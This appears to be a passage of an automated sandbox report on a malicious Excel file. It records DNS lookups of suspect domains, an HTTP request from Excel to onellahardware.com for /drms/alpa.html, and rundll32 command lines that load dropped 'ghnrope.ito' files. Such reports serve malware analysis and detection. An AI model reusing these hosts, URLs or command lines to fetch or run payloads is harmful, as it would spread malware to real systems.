                                                                                          Apr 21, 2021 11:15:15.615122080 CEST49168443192.168.2.2275.119.136.137
                                                                                          Apr 21, 2021 11:15:15.666121960 CEST4434916875.119.136.137192.168.2.22
                                                                                          Apr 21, 2021 11:15:15.666192055 CEST49168443192.168.2.2275.119.136.137
                                                                                          Apr 21, 2021 11:15:16.258929014 CEST49168443192.168.2.2275.119.136.137
                                                                                          Apr 21, 2021 11:15:16.346960068 CEST4434916875.119.136.137192.168.2.22
                                                                                          Apr 21, 2021 11:15:16.638622999 CEST4434916875.119.136.137192.168.2.22
                                                                                          Apr 21, 2021 11:15:16.638834000 CEST49168443192.168.2.2275.119.136.137
                                                                                          Apr 21, 2021 11:15:16.652582884 CEST4434916875.119.136.137192.168.2.22
                                                                                          Apr 21, 2021 11:15:16.652798891 CEST49168443192.168.2.2275.119.136.137
                                                                                          Apr 21, 2021 11:15:16.653906107 CEST4434916875.119.136.137192.168.2.22
                                                                                          Apr 21, 2021 11:15:16.654025078 CEST49168443192.168.2.2275.119.136.137
                                                                                          Apr 21, 2021 11:15:45.198816061 CEST8049165216.244.65.162192.168.2.22
                                                                                          Apr 21, 2021 11:17:12.241662979 CEST49168443192.168.2.2275.119.136.137
                                                                                          Apr 21, 2021 11:17:12.545344114 CEST49168443192.168.2.2275.119.136.137
                                                                                          Apr 21, 2021 11:17:13.153772116 CEST49168443192.168.2.2275.119.136.137
                                                                                          Apr 21, 2021 11:17:14.355073929 CEST49168443192.168.2.2275.119.136.137
                                                                                          Apr 21, 2021 11:17:16.757816076 CEST49168443192.168.2.2275.119.136.137
                                                                                          Apr 21, 2021 11:17:21.562946081 CEST49168443192.168.2.2275.119.136.137
                                                                                          Apr 21, 2021 11:17:31.173209906 CEST49168443192.168.2.2275.119.136.137

                                                                                          UDP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Apr 21, 2021 11:15:12.306926012 CEST5219753192.168.2.228.8.8.8
                                                                                          Apr 21, 2021 11:15:12.510822058 CEST53521978.8.8.8192.168.2.22
                                                                                          Apr 21, 2021 11:15:13.170950890 CEST5309953192.168.2.228.8.8.8
                                                                                          Apr 21, 2021 11:15:13.319551945 CEST53530998.8.8.8192.168.2.22
                                                                                          Apr 21, 2021 11:15:14.157830954 CEST5283853192.168.2.228.8.8.8
                                                                                          Apr 21, 2021 11:15:14.217756033 CEST53528388.8.8.8192.168.2.22
                                                                                          Apr 21, 2021 11:15:14.232471943 CEST6120053192.168.2.228.8.8.8
                                                                                          Apr 21, 2021 11:15:14.281291962 CEST53612008.8.8.8192.168.2.22
                                                                                          Apr 21, 2021 11:15:15.110316038 CEST4954853192.168.2.228.8.8.8
                                                                                          Apr 21, 2021 11:15:15.454591990 CEST53495488.8.8.8192.168.2.22
                                                                                          Apr 21, 2021 11:15:15.771131039 CEST5562753192.168.2.228.8.8.8
                                                                                          Apr 21, 2021 11:15:15.819741964 CEST53556278.8.8.8192.168.2.22
                                                                                          Apr 21, 2021 11:15:15.825186968 CEST5600953192.168.2.228.8.8.8
                                                                                          Apr 21, 2021 11:15:15.873718023 CEST53560098.8.8.8192.168.2.22

                                                                                          DNS Queries

                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                          Apr 21, 2021 11:15:12.306926012 CEST192.168.2.228.8.8.80x26d4Standard query (0)onellahardware.comA (IP address)IN (0x0001)
                                                                                          Apr 21, 2021 11:15:13.170950890 CEST192.168.2.228.8.8.80x437eStandard query (0)habitosdosucesso.netA (IP address)IN (0x0001)
                                                                                          Apr 21, 2021 11:15:15.110316038 CEST192.168.2.228.8.8.80x3797Standard query (0)upesagh.comA (IP address)IN (0x0001)

                                                                                          DNS Answers

                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                          Apr 21, 2021 11:15:12.510822058 CEST8.8.8.8192.168.2.220x26d4No error (0)onellahardware.com216.244.65.162A (IP address)IN (0x0001)
                                                                                          Apr 21, 2021 11:15:13.319551945 CEST8.8.8.8192.168.2.220x437eNo error (0)habitosdosucesso.net198.50.218.68A (IP address)IN (0x0001)
                                                                                          Apr 21, 2021 11:15:15.454591990 CEST8.8.8.8192.168.2.220x3797No error (0)upesagh.com75.119.136.137A (IP address)IN (0x0001)

                                                                                          HTTP Request Dependency Graph

                                                                                          • onellahardware.com

                                                                                          HTTP Packets

                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          0192.168.2.2249165216.244.65.16280C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Apr 21, 2021 11:15:12.734318018 CEST0OUTGET /drms/alpa.html HTTP/1.1
                                                                                          Accept: */*
                                                                                          UA-CPU: AMD64
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                          Host: onellahardware.com
                                                                                          Connection: Keep-Alive
                                                                                          Apr 21, 2021 11:15:13.129909039 CEST1INHTTP/1.1 200 OK
                                                                                          Date: Wed, 21 Apr 2021 09:15:12 GMT
                                                                                          Server: Apache/2
                                                                                          X-Powered-By: PHP/7.1.33
                                                                                          Upgrade: h2,h2c
                                                                                          Connection: Upgrade, Keep-Alive
                                                                                          Vary: User-Agent
                                                                                          Content-Length: 0
                                                                                          Keep-Alive: timeout=2, max=100
                                                                                          Content-Type: text/html; charset=UTF-8


                                                                                          HTTPS Packets

                                                                                          TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                          Apr 21, 2021 11:15:13.599729061 CEST198.50.218.68443192.168.2.2249166CN=habitosdosucesso.net CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBFri Mar 12 01:00:00 CET 2021 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004Fri Jun 11 01:59:59 CEST 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                          CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=USCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBMon May 18 02:00:00 CEST 2015Sun May 18 01:59:59 CEST 2025
                                                                                          CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029
                                                                                          Apr 21, 2021 11:15:15.559954882 CEST75.119.136.137443192.168.2.2249168CN=www.ecomsolution.upesagh.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Sat Apr 17 18:54:21 CEST 2021 Wed Oct 07 21:21:40 CEST 2020Fri Jul 16 18:54:21 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                                                                          Code Manipulations

                                                                                          Statistics

                                                                                          CPU Usage

                                                                                          Click to jump to process

                                                                                          Memory Usage

                                                                                          Click to jump to process

                                                                                          High Level Behavior Distribution

                                                                                          Click to dive into process behavior distribution

                                                                                          Behavior

                                                                                          Click to jump to process

                                                                                          System Behavior

                                                                                          General

                                                                                          Start time:11:14:37
                                                                                          Start date:21/04/2021
                                                                                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                          Imagebase:0x13f1b0000
                                                                                          File size:27641504 bytes
                                                                                          MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high

                                                                                          General

                                                                                          Start time:11:14:44
                                                                                          Start date:21/04/2021
                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:rundll32 ..\ghnrope.ito1,DllRegisterServer
                                                                                          Imagebase:0xff230000
                                                                                          File size:45568 bytes
                                                                                          MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language

                                                                                          General

                                                                                          Start time:11:14:44
                                                                                          Start date:21/04/2021
                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:rundll32 ..\ghnrope.ito2,DllRegisterServer
                                                                                          Imagebase:0xff230000
                                                                                          File size:45568 bytes
                                                                                          MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language

                                                                                          General

                                                                                          Start time:11:14:45
                                                                                          Start date:21/04/2021
                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:rundll32 ..\ghnrope.ito3,DllRegisterServer
                                                                                          Imagebase:0xff230000
                                                                                          File size:45568 bytes
                                                                                          MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language

                                                                                          Disassembly

                                                                                          Code Analysis

                                                                                          Reset < >